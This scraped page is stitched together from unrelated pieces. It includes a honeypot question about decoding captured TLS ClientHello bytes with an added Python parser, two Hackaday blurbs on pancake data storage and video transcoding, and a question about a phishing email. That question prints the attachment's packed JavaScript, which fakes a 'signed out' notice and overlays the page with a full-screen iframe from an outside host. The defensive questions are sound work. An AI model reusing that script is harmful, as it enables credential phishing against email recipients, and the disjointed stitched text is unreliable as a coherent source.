How do I decode this hex encoded string with non-hex characters that I got from a botnet? [on hold]

I am running a honeypot and I got the following string:

'\x16\x03\x01\x01.\x01\x00\x01*\x03\x03\xf2\xbd\x89\x19A"\xbe\xfa\xd4~/\xdb\xd9\xe6\xe7tD\x16/\x12\xb5?\xb6\xf5%\xac\xf1\xd96\x18\x10c\x00\x00\xac\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\x00\xa5\x00\xa3\x00\xa1\x00\x9f\x00k\x00j\x00i\x00h\x009\x008\x007\x006\x00\x88\x00\x87\x00\x86\x00\x85\xc02\xc0.\xc0*\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\x00\xa4\x00\xa2\x00\xa0\x00\x9e\x00g\x00@\x00?\x00>\x003\x002\x001\x000\x00\x9a\x00\x99\x00\x98\x00\x97\x00E\x00D\x00C\x00B\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\xc0\x12\xc0\x08\x00\x16\x00\x13\x00\x10\x00\r\xc0\r\xc0\x03\x00\n\x00\xff\x01\x00\x00U\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x1c\x00\x1a\x00\x17\x00\x19\x00\x1c\x00\x1b\x00\x18\x00\x1a\x00\x16\x00\x0e\x00\r\x00\x0b\x00\x0c\x00\t\x00\n\x00#\x00\x00\x00\r\x00 \x00\x1e\x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x00\x0f\x00\x01\x01'

When I try to decode this using python's .decode("hex") I get the following error:

Non-hexadecimal digit found

I also have another string:

"\x16\x03\x03\x00\xcc\x01\x00\x00\xc8\x03\x03X\xf2e\x9c\x11\x89\x07\x86\xc6\xe5\xf4\xa5\xef\xf8$\xdf\xd2Ul\xeeGw\x83yID\xd7\x8b\xd4\xf4\xba\x1a\x00\x00<\xc0,\xc0+\xc00\xc0/\x00\x9f\x00\x9e\xc0$\xc0#\xc0(\xc0'\xc0\n\xc0\t\xc0\x14\xc0\x13\x009\x003\x00\x9d\x00\x9c\x00=\x00<\x005\x00/\x00\n\x00j\x00@\x008\x002\x00\x13\x00\x05\x00\x04\x01\x00\x00c\x00\x00\x00*\x00(\x00\x00%auth.api.sonyentertainmentnetwork.com\x00\n\x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00\x00\r\x00\x14\x00\x12\x04\x01\x05\x01\x02\x01\x04\x03\x05\x03\x02\x03\x02\x02\x06\x01\x06\x03\x00#\x00\x00\x00\x17\x00\x00\xff\x01\x00\x01\x00"

And with this one I get this error:

Odd-length string

How do I decode these strings?
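
Both captures begin with `\x16\x03\x01` or `\x16\x03\x03`, the header of a TLS handshake record carrying a ClientHello: the text is Python's repr() of raw bytes, where each `\xNN` is one byte, so there is no hex to decode. The example below is added here and is not part of the original question or its answers; it turns that escaped text back into bytes and walks the ClientHello (RFC 5246 layout) to pull out the offered protocol version, cipher suites, extension list and the server name (SNI), which is what a honeypot operator needs in order to classify the client.

```python
import struct

# Second capture from the question as a bytes literal: each \xNN is one raw byte
# (Python repr() output, not hex text, hence "Non-hexadecimal digit found").
CLIENT_HELLO = (
    b"\x16\x03\x03\x00\xcc\x01\x00\x00\xc8\x03\x03X\xf2e\x9c\x11\x89\x07\x86\xc6"
    b"\xe5\xf4\xa5\xef\xf8$\xdf\xd2Ul\xeeGw\x83yID\xd7\x8b\xd4\xf4\xba\x1a\x00"
    b"\x00<\xc0,\xc0+\xc00\xc0/\x00\x9f\x00\x9e\xc0$\xc0#\xc0(\xc0'\xc0\n\xc0\t"
    b"\xc0\x14\xc0\x13\x009\x003\x00\x9d\x00\x9c\x00=\x00<\x005\x00/\x00\n\x00j"
    b"\x00@\x008\x002\x00\x13\x00\x05\x00\x04\x01\x00\x00c\x00\x00\x00*\x00(\x00"
    b"\x00%auth.api.sonyentertainmentnetwork.com\x00\n\x00\x06\x00\x04\x00\x17"
    b"\x00\x18\x00\x0b\x00\x02\x01\x00\x00\r\x00\x14\x00\x12\x04\x01\x05\x01\x02"
    b"\x01\x04\x03\x05\x03\x02\x03\x02\x02\x06\x01\x06\x03\x00#\x00\x00\x00\x17"
    b"\x00\x00\xff\x01\x00\x01\x00"
)
TLS_VERSIONS = {0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}

def unescape_repr(text: str) -> bytes:
    """Turn the escaped text pasted in the question back into the original bytes."""
    return text.encode("latin-1").decode("unicode_escape").encode("latin-1")

def parse_client_hello(record: bytes) -> dict:
    """Parse one TLS record carrying a ClientHello (RFC 5246 layout)."""
    if len(record) < 5 or record[0] != 0x16:          # 0x16 = handshake content type
        raise ValueError("not a TLS handshake record")
    body = record[5:5 + struct.unpack("!H", record[3:5])[0]]
    if len(body) < 4 or body[0] != 0x01:              # 0x01 = ClientHello
        raise ValueError("not a ClientHello")
    hello = body[4:4 + int.from_bytes(body[1:4], "big")]
    version = struct.unpack("!H", hello[0:2])[0]
    pos = 2 + 32                                      # skip client_version and random
    pos += 1 + hello[pos]                             # session_id (length-prefixed)
    cs_len, pos = struct.unpack("!H", hello[pos:pos + 2])[0], pos + 2
    suites = [struct.unpack("!H", hello[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + hello[pos]                             # compression_methods
    exts, sni = [], None
    if pos + 2 <= len(hello):                         # extensions block is optional
        end = pos + 2 + struct.unpack("!H", hello[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", hello[pos:pos + 4])
            data, pos = hello[pos + 4:pos + 4 + elen], pos + 4 + elen
            exts.append(etype)
            if etype == 0 and len(data) >= 5:         # server_name: list len, type, name len, name
                name_len = struct.unpack("!H", data[3:5])[0]
                sni = data[5:5 + name_len].decode("ascii", "replace")
    return {"version": TLS_VERSIONS.get(version, hex(version)),
            "cipher_suites": suites, "extensions": exts, "sni": sni}
```

On the second capture this reports TLS 1.2, 30 cipher suites starting with 0xC02C, and the SNI auth.api.sonyentertainmentnetwork.com; the first capture parses the same way once its repr text is passed through unescape_repr.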

Pancake-ROM: Eat-only Memory?

You can store arbitrary data encoded in binary as a pattern of zeros and ones. What you do to get those zeros and ones is up to you. If you’re in a particularly strange mood, you could even store them as strips of chocolate on Swedish pancakes.

Oddly enough, the possibility of the pancake as digital storage medium was what originally prompted [Michael Kohn] to undertake his similar 2013 project where he encoded his name on a paper wheel. Perhaps wisely, he prototyped on a simpler medium. With that perfected, four years later, it was time to step up to …

Spam Email with Script not Flagged

Our office received an email over Christmas. There was what appeared to be a PDF file attached.

When we examined the file it was actually an HTML file for a spoofed Google login page.

It also had a large amount of encoded <Script>

The decoded script is:

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.2.b="8\'a g r l";k{(j(){m 1=3.2.n(\'1\');1.p=\'o/x-4\';1.i=\'9 4\';1.h=\'6://c.f/d/q/D/H.G\';2.s(\'F\')[0].I(1)}())}J(e){}3.2.K.L="<5 E=\"6://w.v/u/t.y\" z=\"C: 0;B: 7%;A:7%\">";',48,48,'|link|document|window|icon|iframe|http|100|You|shortcut|ve|title|kitt|assets||ai|been|href|rel|function|try|out|var|createElement|image|type|img|signed|getElementsByTagName|daiso|vasdu|top|bowlanreedesntal||html|style|height|width|border|guoguo|src|head|ico|google|appendChild|catch|body|outerHTML'.split('|'),0,{}

Interestingly, the URL in the HTML file was to the correct Google login page.

I thought that emails with scripts would be flagged automatically, akin to sending an .exe or .bat file.

Are there any additional precautions we can take to ensure that messages such as this are flagged or moved to spam in future without user intervention?

Script Your Way Out Of Video Editing Drudgery

[Victor Frost] has a deep voice and a fancy top of the line camera. While one would assume this to be a more than generous situation for life to put a person in, it's got its own set of problems. Mainly that his fantastic fancy camera uses the most modern version of the popular h.264 encoding scheme, h.265. Gasp!

While that too seems like a pro, unfortunately h.265 doesn't play as nice with his editing software. The solution seems easy, just transcode it and get on your way. However, when you start talking about transcoding 4K video from a top-of-the …